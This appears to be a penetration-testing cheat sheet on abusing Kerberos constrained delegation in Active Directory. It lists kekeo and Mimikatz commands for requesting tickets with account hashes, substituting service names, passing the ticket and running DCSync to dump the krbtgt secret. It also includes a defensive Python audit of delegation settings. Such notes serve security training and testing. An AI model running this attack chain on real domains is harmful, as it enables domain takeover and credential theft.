# Constrained Delegation

## Methodology/Steps

1. List all the users having Constrained Delegation (CD) enabled.
2. Keep a note of the `msDS-AllowedToDelegateTo` value.
3. Request a TGT using the hash of the user with CD via kekeo (which we must have collected beforehand).
4. Keep a note of the returned TGT ticket.
5. Now request a TGS, passing the 2nd-step and 4th-step values as the `/service` and `/tgt` parameters.
6. Keep a note of the returned TGS ticket.
7. Now we can inject the returned TGS ticket with Invoke-Mimikatz.
8. We can now list the file system of that computer, e.g. `ls \\dc-mysql\C$`, but we cannot run any WMI commands.
9. But if the delegation target is the DC, we can do the same process and then perform a DCSync attack.

## Enumerate users and computers with CD enabled

```
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
```
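From the defender's side, the same attributes the enumeration above relies on can be audited offline. The following is an added example (not part of the original notes): it takes exported account records, decodes the `userAccountControl` bits, and flags constrained-delegation targets that are domain controllers, plus privileged accounts missing the "sensitive, cannot be delegated" bit. The attribute names and bit values are the real AD ones; the records and DC host list are constructed sample data.

```python
UF_NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition (PowerView's -TrustedToAuth)

def spn_host(spn):
    """Short host name from an SPN such as 'cifs/dc-mysql.domain.local:445' -> 'dc-mysql'."""
    host = spn.split("/", 1)[1].split(":", 1)[0]
    return host.split(".", 1)[0].lower()

def audit_constrained_delegation(records, dc_hosts):
    """One finding per account with msDS-AllowedToDelegateTo populated. Risk is keyed on the
    target host, not the service class: the service name in a ticket is not protected, so any
    service on that host is reachable (cf. the time/...|ldap/... substitution below)."""
    dcs = {h.lower() for h in dc_hosts}
    findings = []
    for r in records:
        targets = r.get("msDS-AllowedToDelegateTo", [])
        if not targets:
            continue                      # no constrained delegation configured
        hosts = {spn_host(t) for t in targets}
        finding = {
            "account": r["sAMAccountName"],
            "protocol_transition": bool(r["userAccountControl"] & UF_TRUSTED_TO_AUTH_FOR_DELEGATION),
            "target_hosts": sorted(hosts),
            "dc_targets": sorted(hosts & dcs),
        }
        if finding["dc_targets"]:
            finding["risk"] = "critical"  # delegation to a DC: DCSync becomes reachable
        elif finding["protocol_transition"]:
            finding["risk"] = "high"      # S4U2Self: users impersonated without their ticket
        else:
            finding["risk"] = "medium"
        findings.append(finding)
    return findings

def unprotected_privileged(records, privileged_names):
    """Privileged accounts lacking NOT_DELEGATED, the mitigation that blocks impersonation."""
    wanted = {n.lower() for n in privileged_names}
    return sorted(r["sAMAccountName"] for r in records
                  if r["sAMAccountName"].lower() in wanted
                  and not r["userAccountControl"] & UF_NOT_DELEGATED)

# Constructed sample export (host names follow the notes on this page).
SAMPLE_RECORDS = [
    {"sAMAccountName": "websvc", "userAccountControl": 0x200 | UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["cifs/dc-mysql.domain.local"]},
    {"sAMAccountName": "dcorp-adminsrv$", "userAccountControl": 0x1000 | UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["time/dcorp-dc.domain.local"]},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x200},
]
SAMPLE_DC_HOSTS = ["dcorp-dc"]
```

Run `audit_constrained_delegation(SAMPLE_RECORDS, SAMPLE_DC_HOSTS)` to see `dcorp-adminsrv$` rated critical because its only target is a DC, and `unprotected_privileged(SAMPLE_RECORDS, ["Administrator"])` to see which privileged accounts still need the NOT_DELEGATED bit set.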

## Requesting a TGT

```
tgt::ask /user:websvc /domain:domain.local /rc4:cc098f204c5887eaa8253e7c2749156f
tgt::ask /user:dcorp-adminsrv /domain:domain.local /rc4:1fadb1b13edbc5a61cbdc389e6f34c67
```

## Request a TGS

```
tgs::s4u /tgt:TGT.kirbi /user:[email protected] /service:cifs/computer.domain.LOCAL
tgs::s4u /tgt:TGT.kirbi /user:[email protected] /service:time/computer.domain.LOCAL|ldap/computer.domain.LOCAL
```

## Inject the ticket

```
Invoke-Mimikatz -Command '"kerberos::ptt TGS.kirbi"'
```

## Execute DCSync

```
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```